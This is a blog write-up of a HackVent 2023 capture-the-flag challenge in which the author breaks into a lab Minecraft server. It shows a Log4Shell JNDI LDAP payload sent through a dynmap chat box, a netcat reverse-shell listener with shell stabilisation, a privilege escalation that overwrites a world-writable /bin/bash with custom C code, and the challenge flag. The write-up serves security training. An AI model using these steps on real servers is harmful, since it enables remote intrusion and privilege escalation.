Gian Klug

HackVent 2023 - [HV23.19] Santa's Minecraft Server

Posted on Jan 1, 2024
Tags: HackVent Writeup

Difficulty: Hard

Categories: Linux, Penetration Testing

Author: nichtseb

Santa likes to play minecraft. His favorite version is 1.16. For security reasons, the server is not publicly accessible. But Santa is a little show-off, so he has an online map to brag about his fabulous building skills.

We get access to a dynmap web interface. The mentioned version 1.16 is vulnerable to the log4j exploit.

Dynmap has a chat box that we can utilize to exploit the log4j vulnerability using this PoC.

We can run the PoC using python3 poc.py --userip 10.13.0.xx --webport 8000 --lport 9001 and also start a netcat listener using nc -lvp 9001.

The PoC outputs us a payload tat we can use:

[+] Send me: ${jndi:ldap://10.13.0.xx:1389/a}`

After entering this in the chat box, we get a reverse shell connection. First, we stabilize the shell:

/usr/bin/script -qc /bin/bash /dev/null
^Z
stty raw -echo; fg

We can’t read the flag under /home/santa/flag.txt so probably we’ll have to do privilege escalation. There is a /santas-workshop with a tool binary that has the setuid bit set for the santa user. There is also source code for the tool binary:

#include <unistd.h>
#include <stdio.h>

void debugShell() {
	printf("Launching debug shell...\n");
	char *argv[] = { "/bin/bash", 0 };
	execve(argv[0], &argv[0], NULL);
}

void main() {
	printf("--- Santas Workshop Tool ---\n");
	printf("Pick an action:\n");
	printf("s) debug shell\n");
	printf("-- more options to come\n");

	char option;
	scanf("%c", &option);

	switch (option) {
	case 's': debugShell(); break;
	default: printf("Unknonwn option!\n"); break;
	}

Bash ususally drops the setuid privileges, we could circumvent that with suidbash (which was the inteneded solution). However, I noticed that /bin/bash is world-writeable so I just compiled an own binary and overwrote it:

cat > /tmp/shell.c

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
	    setresuid(1000,1000,1000);
        system("cat /home/santa/flag.txt");
        return 0;
}

gcc -o /tmp/shell /tmp/shell.c
cat /tmp/shell > /bin/bash
/santas-workshop/tool

--- Santas Workshop Tool ---
Pick an action:
s) debug shell
-- more options to come
s
Launching debug shell...
HV23{d0n7_f0rg37_70_upd473_k1d5}